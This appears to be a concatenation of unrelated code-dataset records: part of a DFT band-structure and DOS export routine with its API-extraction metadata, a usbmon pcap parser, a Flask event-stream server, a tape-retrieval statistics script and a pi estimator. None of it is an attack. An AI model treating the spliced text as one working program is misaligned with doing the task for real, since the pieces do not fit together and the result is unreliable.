input_dict['dos']['last'] = last_state
input_dict['dos']['projections_atoms'] = get_dos_projections_atoms(wf.get_atomic_numbers())
d3_content = str(D3(input_dict))
inp = open(os.path.join(work_folder, 'INPUT'), "w")
inp.write(d3_content)
inp.close()
start_time = time.time()
p = subprocess.Popen(
exec_cmd % (work_folder, EXEC_PATH, os.path.join(work_folder, 'OUTPUT')),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True
)
try:
p.communicate(timeout=timeout or EXEC_TIMEOUT)
except subprocess.TimeoutExpired:
kill(p.pid)
return None, work_folder, 'PROPERTIES killed as too time-consuming'
print("Done in %1.2f sc" % (time.time() - start_time))
if p.returncode != 0:
return None, work_folder, 'PROPERTIES failed'
if not os.path.exists(os.path.join(work_folder, 'BAND.DAT')) \
or not os.path.exists(os.path.join(work_folder, 'DOSS.DAT')) \
or not os.path.exists(os.path.join(work_folder, 'fort.25')):
return None, work_folder, 'PROPERTIES missing outputs'
try:
result = Fort25(os.path.join(work_folder, 'fort.25')).parse()
except AssertionError: # FIXME: how to prevent this
return None, work_folder, 'PANIC: PROPERTIES AssertionError'
except ParseException: # FIXME: how to prevent this
return None, work_folder, 'PANIC: PROPERTIES ParseException'
bands = result.get("BAND", None)
dos = result.get("DOSS", None)
if not bands or not dos:
return None, work_folder, 'PROPERTIES missing BANDS or DOS'
# get rid of the negative DOS artifacts
dos['dos_up'][ dos['dos_up'] < 0 ] = 0
dos['dos_up'] *= Hartree
if dos['dos_down'] is not None:
assert len(dos['dos_up'][0]) == len(dos['dos_down'][0])
dos['dos_down'][ dos['dos_down'] < 0 ] = 0
dos['dos_down'] *= Hartree
# sum up and down: FIXME
dos['dos_up'] += dos['dos_down']
dos['e'] *= Hartree
dos['e_fermi'] *= Hartree
#cell = wf.get_cell(scale=True) # for path construction we're getting geometry from fort.9
# NB fort.9 may produce slightly different structure, so use fort.34
cell = f34.abc, f34.positions, f34.atomic_numbers
path_description = construct_kpoints_path(cell, bands['path'], shrink, bands['n_k'])
# find k-points along the path
k_points = get_explicit_kpoints_path(structure, path_description)['explicit_kpoints']
# pass through the internal AiiDA repr
bands_data = DataFactory('array.bands')()
bands_data.set_kpointsdata(k_points)
if bands['bands_down'] is not None:
# sum up and down: FIXME: how to prevent this
try:
bands_data.set_bands(np.hstack(( (bands['bands_up'] - bands['e_fermi']) * Hartree, (bands['bands_down'] - bands['e_fermi']) * Hartree )))
except ValueError:
return None, work_folder, 'PANIC: cannot sum up and down bands'
else:
bands_data.set_bands((bands['bands_up'] - bands['e_fermi']) * Hartree)
return (bands_data, dos), work_folder, None
def properties_export(bands_data, dos_data, ase_struct):
bands_array = bands_data.get_array('bands')
e_min, e_max = np.amin(bands_array), np.amax(bands_array)
dos_energies = np.linspace(e_min, e_max, num=len(dos_data['dos_up'][0]))
stripes = bands_array.transpose().copy()
if is_conductor(stripes):
indirect_gap, direct_gap = None, None
else:
indirect_gap, direct_gap = get_band_gap_info(stripes)
if (direct_gap and direct_gap > 20) or (indirect_gap and indirect_gap > 20):
return None, '%s: UNPHYSICAL BAND GAP: %2.2f / %2.2f' % (ase_struct.get_chemical_formula(), direct_gap, indirect_gap)
if (direct_gap and direct_gap > 15) or (indirect_gap and indirect_gap > 15):
warnings.warn('%s: SUSPICION FOR UNPHYSICAL BAND GAP: %2.2f / %2.2f' % (ase_struct.get_chemical_formula(), direct_gap, indirect_gap))
expected_metal = guess_metal(ase_struct)
if expected_metal and (direct_gap or indirect_gap):
warnings.warn('%s: SUSPICION FOR METAL WITH BAND GAPS: %2.2f / %2.2f' % (ase_struct.get_chemical_formula(), direct_gap, indirect_gap))
if not expected_metal and not direct_gap and not indirect_gap:
warnings.warn('%s: SUSPICION FOR NON-METAL WITHOUT BAND GAPS' % ase_struct.get_chemical_formula())
# export only the range of the interest
E_MIN, E_MAX = -10, 20
stripes = stripes[ (stripes[:,0] > E_MIN) & (stripes[:,0] < E_MAX) ]
dos = []
for n, ene in enumerate(dos_energies): # FIXME use numpy advanced slicing
if E_MIN < ene < E_MAX:
dos.append(dos_data['dos_up'][0][n])
dos_energies = dos_energies[ (dos_energies > E_MIN) & (dos_energies < E_MAX) ]
return {
# gaps
'direct_gap': direct_gap,
'indirect_gap': indirect_gap,
# dos values
'dos': np.round(np.array(dos), 3).tolist(),
'levels': np.round(dos_energies, 3).tolist(),
'e_fermi': dos_data['e_fermi'],
# bands values
'k_points': bands_data.get_array('kpoints').tolist(),
'stripes': np.round(stripes, 3).tolist(),
}, None
| [
"configparser.ConfigParser",
"numpy.hstack",
"psutil.Process",
"numpy.array",
"aiida_crystal_dft.utils.kpoints.get_shrink_kpoints_path",
"aiida_crystal_dft.io.d3.D3",
"aiida_crystal_dft.utils.kpoints.get_explicit_kpoints_path",
"numpy.max",
"numpy.min",
"numpy.round",
"random.choice",
"numpy.amin",
"numpy.average",
"aiida_crystal_dft.utils.kpoints.construct_kpoints_path",
"os.path.dirname",
"aiida.plugins.DataFactory",
"shutil.copy",
"time.time",
"os.makedirs",
"os.path.join",
"datetime.datetime.now",
"aiida_crystal_dft.io.f34.Fort34",
"numpy.amax"
] | [((1395, 1409), 'configparser.ConfigParser', 'ConfigParser', ([], {}), '()\n', (1407, 1409), False, 'from configparser import ConfigParser\n'), ((1448, 1456), 'aiida_crystal_dft.io.f34.Fort34', 'Fort34', ([], {}), '()\n', (1454, 1456), False, 'from aiida_crystal_dft.io.f34 import Fort34\n'), ((2491, 2515), 'psutil.Process', 'psutil.Process', (['proc_pid'], {}), '(proc_pid)\n', (2505, 2515), False, 'import psutil\n'), ((4076, 4109), 'shutil.copy', 'shutil.copy', (['wf_path', 'work_folder'], {}), '(wf_path, work_folder)\n', (4087, 4109), False, 'import shutil\n'), ((4580, 4614), 'aiida_crystal_dft.utils.kpoints.get_shrink_kpoints_path', 'get_shrink_kpoints_path', (['structure'], {}), '(structure)\n', (4603, 4614), False, 'from aiida_crystal_dft.utils.kpoints import construct_kpoints_path, get_explicit_kpoints_path, get_shrink_kpoints_path\n'), ((5157, 5168), 'time.time', 'time.time', ([], {}), '()\n', (5166, 5168), False, 'import time\n'), ((7139, 7204), 'aiida_crystal_dft.utils.kpoints.construct_kpoints_path', 'construct_kpoints_path', (['cell', "bands['path']", 'shrink', "bands['n_k']"], {}), "(cell, bands['path'], shrink, bands['n_k'])\n", (7161, 7204), False, 'from aiida_crystal_dft.utils.kpoints import construct_kpoints_path, get_explicit_kpoints_path, get_shrink_kpoints_path\n'), ((1919, 1942), 'numpy.min', 'np.min', (['band_stripes[n]'], {}), '(band_stripes[n])\n', (1925, 1942), True, 'import numpy as np\n'), ((2873, 2906), 'numpy.average', 'np.average', (['at_type_chgs[at_type]'], {}), '(at_type_chgs[at_type])\n', (2883, 2906), True, 'import numpy as np\n'), ((3216, 3249), 'numpy.average', 'np.average', (['at_type_chgs[at_type]'], {}), '(at_type_chgs[at_type])\n', (3226, 3249), True, 'import numpy as np\n'), ((4030, 4070), 'os.makedirs', 'os.makedirs', (['work_folder'], {'exist_ok': '(False)'}), '(work_folder, exist_ok=False)\n', (4041, 4070), False, 'import os\n'), ((4223, 4258), 'os.path.join', 'os.path.join', (['work_folder', '"""fort.9"""'], {}), "(work_folder, 'fort.9')\n", (4235, 4258), False, 'import os\n'), ((5025, 5039), 'aiida_crystal_dft.io.d3.D3', 'D3', (['input_dict'], {}), '(input_dict)\n', (5027, 5039), False, 'from aiida_crystal_dft.io.d3 import D3\n'), ((5056, 5090), 'os.path.join', 'os.path.join', (['work_folder', '"""INPUT"""'], {}), "(work_folder, 'INPUT')\n", (5068, 5090), False, 'import os\n'), ((7255, 7309), 'aiida_crystal_dft.utils.kpoints.get_explicit_kpoints_path', 'get_explicit_kpoints_path', (['structure', 'path_description'], {}), '(structure, path_description)\n', (7280, 7309), False, 'from aiida_crystal_dft.utils.kpoints import construct_kpoints_path, get_explicit_kpoints_path, get_shrink_kpoints_path\n'), ((7391, 7417), 'aiida.plugins.DataFactory', 'DataFactory', (['"""array.bands"""'], {}), "('array.bands')\n", (7402, 7417), False, 'from aiida.plugins import DataFactory\n'), ((8086, 8106), 'numpy.amin', 'np.amin', (['bands_array'], {}), '(bands_array)\n', (8093, 8106), True, 'import numpy as np\n'), ((8108, 8128), 'numpy.amax', 'np.amax', (['bands_array'], {}), '(bands_array)\n', (8115, 8128), True, 'import numpy as np\n'), ((1984, 2011), 'numpy.max', 'np.max', (['band_stripes[n - 1]'], {}), '(band_stripes[n - 1])\n', (1990, 2011), True, 'import numpy as np\n'), ((4139, 4163), 'os.path.dirname', 'os.path.dirname', (['wf_path'], {}), '(wf_path)\n', (4154, 4163), False, 'import os\n'), ((4487, 4511), 'os.path.dirname', 'os.path.dirname', (['wf_path'], {}), '(wf_path)\n', (4502, 4511), False, 'import os\n'), ((2070, 2115), 'numpy.min', 'np.min', 
(['(band_stripes[n] - band_stripes[n - 1])'], {}), '(band_stripes[n] - band_stripes[n - 1])\n', (2076, 2115), True, 'import numpy as np\n'), ((5239, 5274), 'os.path.join', 'os.path.join', (['work_folder', '"""OUTPUT"""'], {}), "(work_folder, 'OUTPUT')\n", (5251, 5274), False, 'import os\n'), ((5581, 5592), 'time.time', 'time.time', ([], {}), '()\n', (5590, 5592), False, 'import time\n'), ((5716, 5753), 'os.path.join', 'os.path.join', (['work_folder', '"""BAND.DAT"""'], {}), "(work_folder, 'BAND.DAT')\n", (5728, 5753), False, 'import os\n'), ((5787, 5824), 'os.path.join', 'os.path.join', (['work_folder', '"""DOSS.DAT"""'], {}), "(work_folder, 'DOSS.DAT')\n", (5799, 5824), False, 'import os\n'), ((5858, 5894), 'os.path.join', 'os.path.join', (['work_folder', '"""fort.25"""'], {}), "(work_folder, 'fort.25')\n", (5870, 5894), False, 'import os\n'), ((7601, 7719), 'numpy.hstack', 'np.hstack', (["((bands['bands_up'] - bands['e_fermi']) * Hartree, (bands['bands_down'] -\n bands['e_fermi']) * Hartree)"], {}), "(((bands['bands_up'] - bands['e_fermi']) * Hartree, (bands[\n 'bands_down'] - bands['e_fermi']) * Hartree))\n", (7610, 7719), True, 'import numpy as np\n'), ((5994, 6030), 'os.path.join', 'os.path.join', (['work_folder', '"""fort.25"""'], {}), "(work_folder, 'fort.25')\n", (6006, 6030), False, 'import os\n'), ((9846, 9871), 'numpy.round', 'np.round', (['dos_energies', '(3)'], {}), '(dos_energies, 3)\n', (9854, 9871), True, 'import numpy as np\n'), ((10027, 10047), 'numpy.round', 'np.round', (['stripes', '(3)'], {}), '(stripes, 3)\n', (10035, 10047), True, 'import numpy as np\n'), ((9800, 9813), 'numpy.array', 'np.array', (['dos'], {}), '(dos)\n', (9808, 9813), True, 'import numpy as np\n'), ((3889, 3903), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (3901, 3903), False, 'from datetime import datetime\n'), ((3952, 3989), 'random.choice', 'random.choice', (['string.ascii_lowercase'], {}), '(string.ascii_lowercase)\n', (3965, 3989), False, 'import random\n')] |
# This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild
from pkg_resources import parse_version
import kaitaistruct
from kaitaistruct import KaitaiStruct, KaitaiStream, BytesIO
from enum import Enum
if parse_version(kaitaistruct.__version__) < parse_version('0.9'):
raise Exception("Incompatible Kaitai Struct Python API: 0.9 or later is required, but you have %s" % (kaitaistruct.__version__))
from . import usb_pcap_endpoint_number
class Usbmon(KaitaiStruct):
"""A native pcap header of [usbmon](https://www.kernel.org/doc/Documentation/usb/usbmon.txt) part of libpcap and Linux kernel.
.. seealso::
Source - https://github.com/the-tcpdump-group/libpcap/blob/ba0ef0353ed9f9f49a1edcfb49fefaf12dec54de/pcap/usb.h#L94
.. seealso::
Source - https://www.kernel.org/doc/Documentation/usb/usbmon.txt
.. seealso::
Source - https://www.kernel.org/doc/html/latest/driver-api/usb/URB.html
.. seealso::
Source - https://wiki.wireshark.org/USB
"""
def __init__(self, header_size, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self.header_size = header_size
self._read()
def _read(self):
self._raw_header = self._io.read_bytes(self.header_size)
_io__raw_header = KaitaiStream(BytesIO(self._raw_header))
self.header = Usbmon.Header(_io__raw_header, self, self._root)
self.data = self._io.read_bytes(self.header.data_size)
class Timestamp(KaitaiStruct):
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._read()
def _read(self):
self.seconds = self._io.read_s8le()
self.microseconds = self._io.read_s4le()
class Header(KaitaiStruct):
class EventType(Enum):
completion = 67
error = 69
submit = 83
class TransferType(Enum):
isochronous = 0
interrupt = 1
control = 2
bulk = 3
class SetupFlag(Enum):
relevant = 0
irrelevant = 45
class DataFlag(Enum):
urb = 0
incoming = 60
outgoing = 62
error = 69
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._read()
def _read(self):
self.urb_id = self._io.read_u8le()
self.event_type = KaitaiStream.resolve_enum(Usbmon.Header.EventType, self._io.read_u1())
self.transfer_type = KaitaiStream.resolve_enum(Usbmon.Header.TransferType, self._io.read_u1())
self.endpoint_number = usb_pcap_endpoint_number.UsbPcapEndpointNumber(self._io)
self.device_address = self._io.read_u1()
self.bus_id = self._io.read_u2le()
self.setup_flag = KaitaiStream.resolve_enum(Usbmon.Header.SetupFlag, self._io.read_u1())
self.data_flag = KaitaiStream.resolve_enum(Usbmon.Header.DataFlag, self._io.read_u1())
self.timestamp = Usbmon.Timestamp(self._io, self, self._root)
self.status = self._io.read_s4le()
self.urb_size = self._io.read_s4le()
self.data_size = self._io.read_s4le()
if self.setup_flag == Usbmon.Header.SetupFlag.relevant:
self.setup = Usbmon.Header.Setup(self._io, self, self._root)
class Setup(KaitaiStruct):
"""
.. seealso::
Source - https://github.com/the-tcpdump-group/libpcap/blob/ba0ef0353ed9f9f49a1edcfb49fefaf12dec54de/pcap/usb.h#L118
"""
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._read()
def _read(self):
self.s = self._io.read_bytes(8)
self.interval = self._io.read_s4le()
self.start_frame = self._io.read_s4le()
self.copy_of_urb_transfer_flags = self._io.read_s4le()
self.iso_descriptors_count = self._io.read_s4le()
class PcapUsbSetup(KaitaiStruct):
"""USB setup header as defined in USB specification.
Appears at the front of each Control S-type packet in DLT_USB captures.
"""
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._read()
def _read(self):
self.request_type = self._io.read_u1()
self.request = self._io.read_u1()
self.value = self._io.read_u2le()
self.index = self._io.read_u2le()
self.length = self._io.read_u2le()
class IsoRec(KaitaiStruct):
"""Information from the URB for Isochronous transfers.
.. seealso::
Source - https://github.com/the-tcpdump-group/libpcap/blob/ba0ef0353ed9f9f49a1edcfb49fefaf12dec54de/pcap/usb.h#L70
"""
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._read()
def _read(self):
self.error_count = self._io.read_s4le()
self.descriptors_count = self._io.read_s4le()
| [
"pkg_resources.parse_version",
"kaitaistruct.BytesIO"
] | [((248, 287), 'pkg_resources.parse_version', 'parse_version', (['kaitaistruct.__version__'], {}), '(kaitaistruct.__version__)\n', (261, 287), False, 'from pkg_resources import parse_version\n'), ((290, 310), 'pkg_resources.parse_version', 'parse_version', (['"""0.9"""'], {}), "('0.9')\n", (303, 310), False, 'from pkg_resources import parse_version\n'), ((1429, 1454), 'kaitaistruct.BytesIO', 'BytesIO', (['self._raw_header'], {}), '(self._raw_header)\n', (1436, 1454), False, 'from kaitaistruct import KaitaiStruct, KaitaiStream, BytesIO\n')] |
# Copyright (c) 2021, Oracle and/or its affiliates.
# All rights reserved. The Universal Permissive License (UPL), Version 1.0 as shown at http://oss.oracle.com/licenses/upl
import multiprocessing
import os
import sys
import uuid
import flask
# multiprocessing patch
import mp_patch
from datafetch import odatafetch
from log_util import get_logger
from sse import SSE
logger = get_logger(__name__, os.environ.get('LOG_LEVEL'))
mp_patch.apply()
# this line fixes issues with ptvsd debugger
multiprocessing.set_start_method('spawn', True)
# Serve the static content out of the 'static' folder
app = flask.Flask(__name__, static_folder="static")
# Global cache header
@app.after_request
def apply_caching(response):
response.headers["Cache-Control"] = "no-cache"
response.headers["Pragma"] = "no-cache"
return response
# index route
@app.route("/", methods=['GET'])
def static_proxy():
return app.send_static_file("index.html")
# Server Sent Event route, server-push the data to the clients
@app.route("/data", methods=['GET'])
def data_stream():
def stream():
# on connection, subscribe to message queue with uuid
client_id = str(uuid.uuid4())
try:
messages = broadcaster.subscribe(client_id) # returns a multiprocessing.Queue
while True:
# blocks as long as queue is empty
yield messages.get()
finally:
# on disconnect, unsubscribe this client
broadcaster.unsubscribe(client_id)
# serve an 'event-stream', i.e. a long polling request
return flask.Response(stream(), mimetype='text/event-stream')
if __name__ == '__main__':
# define an object manager from multiprocessing,
# as our data fetching code runs on a separate process
mgr = multiprocessing.Manager()
# the clients dict keeps track of connected clients.
clients = mgr.dict()
# initialize the SSE broadcaster
broadcaster = SSE(clients, mgr)
# run the data call as a separate process, pass it the shared client list
thread1 = multiprocessing.Process(target=odatafetch, args=(clients,))
thread1.start()
# run the actual web server
path = os.path.realpath(sys.path[0])
host = os.environ.get("HOST", "127.0.0.1")
app.run(port=8000, host=host, debug=False)
| [
"sse.SSE",
"mp_patch.apply",
"flask.Flask",
"multiprocessing.Process",
"os.environ.get",
"uuid.uuid4",
"os.path.realpath",
"multiprocessing.Manager",
"multiprocessing.set_start_method"
] | [((432, 448), 'mp_patch.apply', 'mp_patch.apply', ([], {}), '()\n', (446, 448), False, 'import mp_patch\n'), ((495, 542), 'multiprocessing.set_start_method', 'multiprocessing.set_start_method', (['"""spawn"""', '(True)'], {}), "('spawn', True)\n", (527, 542), False, 'import multiprocessing\n'), ((604, 649), 'flask.Flask', 'flask.Flask', (['__name__'], {'static_folder': '"""static"""'}), "(__name__, static_folder='static')\n", (615, 649), False, 'import flask\n'), ((403, 430), 'os.environ.get', 'os.environ.get', (['"""LOG_LEVEL"""'], {}), "('LOG_LEVEL')\n", (417, 430), False, 'import os\n'), ((1801, 1826), 'multiprocessing.Manager', 'multiprocessing.Manager', ([], {}), '()\n', (1824, 1826), False, 'import multiprocessing\n'), ((1964, 1981), 'sse.SSE', 'SSE', (['clients', 'mgr'], {}), '(clients, mgr)\n', (1967, 1981), False, 'from sse import SSE\n'), ((2075, 2134), 'multiprocessing.Process', 'multiprocessing.Process', ([], {'target': 'odatafetch', 'args': '(clients,)'}), '(target=odatafetch, args=(clients,))\n', (2098, 2134), False, 'import multiprocessing\n'), ((2199, 2228), 'os.path.realpath', 'os.path.realpath', (['sys.path[0]'], {}), '(sys.path[0])\n', (2215, 2228), False, 'import os\n'), ((2240, 2275), 'os.environ.get', 'os.environ.get', (['"""HOST"""', '"""127.0.0.1"""'], {}), "('HOST', '127.0.0.1')\n", (2254, 2275), False, 'import os\n'), ((1177, 1189), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (1187, 1189), False, 'import uuid\n')] |
#!/usr/bin/env python
__author__ = 'meatz'
import numpy as np
import csv
import gzip
import sys
import time
import os
import re
import json
import time
import calendar
import datetime
from collections import defaultdict
from collections import Counter
import fnmatch
# add ecmwf_utils to python path
util_path = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))
print (util_path)
sys.path.append(util_path)
from ecmwf_util import Statistics
def prettyfy(number):
d = float(number)
if d - int(d) > 0:
return '{:,.2f}'.format(d)
return '{:,d}'.format(int(d))
results = {}
tapes_counter = Counter()
results["total_counted_requests"] = 0
results["total_requests_with_fdb"] = 0
results["total_requests_with_tape"] = 0
results["total_requests_with_disk"] = 0
results["total_requests_with_fdb_only"] = 0
results["total_requests_with_tape_only"] = 0
results["total_requests_with_disk_only"] = 0
exectimes_with_tape = Counter()
exectimes_no_tape = Counter()
def dump(todo_list_retrieves):
TS = 0
FIELDS = 1
FIELDS_ONLINE = 2
FIELDS_OFFLINE = 3
BYTES = 4
BYTES_ONLINE = 5
BYTES_OFFLINE = 6
TAPES = 7
TAPE_FILES = 8
EXEC_TIME = 9
DATABASE = 10
retrieves_files_read_cnt = 0
for sf in source_files:
retrieves_files_read_cnt += 1
# if retrieves_files_read_cnt == 3:
# return
with gzip.open(sf, 'rt') as csv_file:
reader = csv.reader(csv_file, delimiter=';')
next(reader) # skip header
for row in reader:
fields = int(row[FIELDS]) + int(row[FIELDS_ONLINE]) + int(row[FIELDS_OFFLINE])
bytes = int(row[BYTES])
bytes_online = int(row[BYTES_ONLINE])
bytes_offline = int(row[BYTES_OFFLINE])
tapes = int(row[TAPES])
exec_time = int(row[EXEC_TIME])
if bytes > 0:
if bytes > (1024 * 1024 * 1024 * 1024) :
print ("skipping line: %s" % row)
pass
else:
results["total_counted_requests"] += 1
tapes_counter[tapes] += 1
if bytes > 0 and (bytes_online + bytes_offline) != bytes:
results["total_requests_with_fdb"] += 1
if bytes_online > 0:
results["total_requests_with_disk"] += 1
if bytes_offline > 0:
results["total_requests_with_tape"] += 1
if bytes > 0 and bytes_online == 0 and bytes_offline == 0:
results["total_requests_with_fdb_only"] += 1
if bytes > 0 and bytes_online == bytes and bytes_offline == 0:
results["total_requests_with_disk_only"] += 1
if bytes > 0 and bytes_online == 0 and bytes_offline == bytes:
results["total_requests_with_tape_only"] += 1
if tapes > 0:
exectimes_with_tape[exec_time] += 1
else:
exectimes_no_tape[exec_time] += 1
print("%s finished reading retrieves_file: %d : %s" % (datetime.datetime.now(), retrieves_files_read_cnt, sf))
if __name__ == "__main__":
if len(sys.argv) != 2:
print ("usage: /path/to/*retrieves.csv.gz")
sys.exit(1)
source_dir = os.path.abspath(sys.argv[1])
source_files = [os.path.join(dirpath, f)
for dirpath, dirnames, files in os.walk(source_dir)
for f in fnmatch.filter(files, '*.retrieves.csv.gz')]
dump(source_files)
results["fraction_of_requests_with_tape_percent"] = prettyfy(float(results["total_requests_with_tape"]) / results["total_counted_requests"] * 100)
er = {}
er["with_tape"] = {}
er["no_tape"] = {}
er["tapes_counter"] = {}
elems = list(exectimes_no_tape.elements())
er["no_tape"]["P05"] = prettyfy(Statistics.percentile(elems, 0.05))
er["no_tape"]["P25"] = prettyfy(Statistics.percentile(elems, 0.25))
er["no_tape"]["P50"] = prettyfy(Statistics.percentile(elems, 0.50))
er["no_tape"]["P95"] = prettyfy(Statistics.percentile(elems, 0.95))
er["no_tape"]["P99"] = prettyfy(Statistics.percentile(elems, 0.99))
er["no_tape"]["mean"] = Statistics.get_meanconf_string(elems)
elems = list(exectimes_with_tape.elements())
er["with_tape"]["P05"] = prettyfy(Statistics.percentile(elems, 0.05))
er["with_tape"]["P25"] = prettyfy(Statistics.percentile(elems, 0.25))
er["with_tape"]["P50"] = prettyfy(Statistics.percentile(elems, 0.50))
er["with_tape"]["P95"] = prettyfy(Statistics.percentile(elems, 0.95))
er["with_tape"]["P99"] = prettyfy(Statistics.percentile(elems, 0.99))
er["with_tape"]["mean"] = Statistics.get_meanconf_string(elems)
tapes_counter
elems = list(tapes_counter.elements())
er["tapes_counter"]["P05"] = prettyfy(Statistics.percentile(elems, 0.05))
er["tapes_counter"]["P25"] = prettyfy(Statistics.percentile(elems, 0.25))
er["tapes_counter"]["P50"] = prettyfy(Statistics.percentile(elems, 0.50))
er["tapes_counter"]["P95"] = prettyfy(Statistics.percentile(elems, 0.95))
er["tapes_counter"]["P99"] = prettyfy(Statistics.percentile(elems, 0.99))
er["tapes_counter"]["mean"] = Statistics.get_meanconf_string(elems)
results["tape_exectimes"] = er
print (json.dumps(results, indent=2)) | [
"gzip.open",
"json.dumps",
"os.path.join",
"ecmwf_util.Statistics.get_meanconf_string",
"collections.Counter",
"datetime.datetime.now",
"fnmatch.filter",
"ecmwf_util.Statistics.percentile",
"sys.exit",
"os.path.abspath",
"csv.reader",
"sys.path.append",
"os.walk"
] | [((427, 453), 'sys.path.append', 'sys.path.append', (['util_path'], {}), '(util_path)\n', (442, 453), False, 'import sys\n'), ((657, 666), 'collections.Counter', 'Counter', ([], {}), '()\n', (664, 666), False, 'from collections import Counter\n'), ((983, 992), 'collections.Counter', 'Counter', ([], {}), '()\n', (990, 992), False, 'from collections import Counter\n'), ((1013, 1022), 'collections.Counter', 'Counter', ([], {}), '()\n', (1020, 1022), False, 'from collections import Counter\n'), ((3647, 3675), 'os.path.abspath', 'os.path.abspath', (['sys.argv[1]'], {}), '(sys.argv[1])\n', (3662, 3675), False, 'import os\n'), ((4549, 4586), 'ecmwf_util.Statistics.get_meanconf_string', 'Statistics.get_meanconf_string', (['elems'], {}), '(elems)\n', (4579, 4586), False, 'from ecmwf_util import Statistics\n'), ((5037, 5074), 'ecmwf_util.Statistics.get_meanconf_string', 'Statistics.get_meanconf_string', (['elems'], {}), '(elems)\n', (5067, 5074), False, 'from ecmwf_util import Statistics\n'), ((5565, 5602), 'ecmwf_util.Statistics.get_meanconf_string', 'Statistics.get_meanconf_string', (['elems'], {}), '(elems)\n', (5595, 5602), False, 'from ecmwf_util import Statistics\n'), ((3617, 3628), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3625, 3628), False, 'import sys\n'), ((3697, 3721), 'os.path.join', 'os.path.join', (['dirpath', 'f'], {}), '(dirpath, f)\n', (3709, 3721), False, 'import os\n'), ((4197, 4231), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.05)'], {}), '(elems, 0.05)\n', (4218, 4231), False, 'from ecmwf_util import Statistics\n'), ((4269, 4303), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.25)'], {}), '(elems, 0.25)\n', (4290, 4303), False, 'from ecmwf_util import Statistics\n'), ((4341, 4374), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.5)'], {}), '(elems, 0.5)\n', (4362, 4374), False, 'from ecmwf_util import Statistics\n'), ((4413, 4447), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.95)'], {}), '(elems, 0.95)\n', (4434, 4447), False, 'from ecmwf_util import Statistics\n'), ((4485, 4519), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.99)'], {}), '(elems, 0.99)\n', (4506, 4519), False, 'from ecmwf_util import Statistics\n'), ((4675, 4709), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.05)'], {}), '(elems, 0.05)\n', (4696, 4709), False, 'from ecmwf_util import Statistics\n'), ((4749, 4783), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.25)'], {}), '(elems, 0.25)\n', (4770, 4783), False, 'from ecmwf_util import Statistics\n'), ((4823, 4856), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.5)'], {}), '(elems, 0.5)\n', (4844, 4856), False, 'from ecmwf_util import Statistics\n'), ((4897, 4931), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.95)'], {}), '(elems, 0.95)\n', (4918, 4931), False, 'from ecmwf_util import Statistics\n'), ((4971, 5005), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.99)'], {}), '(elems, 0.99)\n', (4992, 5005), False, 'from ecmwf_util import Statistics\n'), ((5183, 5217), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.05)'], {}), '(elems, 0.05)\n', (5204, 5217), False, 'from ecmwf_util import Statistics\n'), ((5261, 5295), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.25)'], {}), '(elems, 0.25)\n', (5282, 
5295), False, 'from ecmwf_util import Statistics\n'), ((5339, 5372), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.5)'], {}), '(elems, 0.5)\n', (5360, 5372), False, 'from ecmwf_util import Statistics\n'), ((5417, 5451), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.95)'], {}), '(elems, 0.95)\n', (5438, 5451), False, 'from ecmwf_util import Statistics\n'), ((5495, 5529), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.99)'], {}), '(elems, 0.99)\n', (5516, 5529), False, 'from ecmwf_util import Statistics\n'), ((5655, 5684), 'json.dumps', 'json.dumps', (['results'], {'indent': '(2)'}), '(results, indent=2)\n', (5665, 5684), False, 'import json\n'), ((1433, 1452), 'gzip.open', 'gzip.open', (['sf', '"""rt"""'], {}), "(sf, 'rt')\n", (1442, 1452), False, 'import gzip\n'), ((1487, 1522), 'csv.reader', 'csv.reader', (['csv_file'], {'delimiter': '""";"""'}), "(csv_file, delimiter=';')\n", (1497, 1522), False, 'import csv\n'), ((3762, 3781), 'os.walk', 'os.walk', (['source_dir'], {}), '(source_dir)\n', (3769, 3781), False, 'import os\n'), ((3799, 3842), 'fnmatch.filter', 'fnmatch.filter', (['files', '"""*.retrieves.csv.gz"""'], {}), "(files, '*.retrieves.csv.gz')\n", (3813, 3842), False, 'import fnmatch\n'), ((379, 404), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (394, 404), False, 'import os\n'), ((3445, 3468), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (3466, 3468), False, 'import datetime\n')] |
# how to find pi with random number generator
import numpy as np
def pi(sample):
batch = 1000
n = sample // batch
total_less_than_1 = 0
for i in range(n):
rand_num = np.random.rand(batch, 2)
square_total = (rand_num * rand_num).sum(axis=1)
total_less_than_1 += (square_total <= 1).sum()
print('P(x2 + y2 <= 1) = ', total_less_than_1 / sample)
print('approx pi is ', 4 * total_less_than_1 / sample)
    return 4 * total_less_than_1 / sample
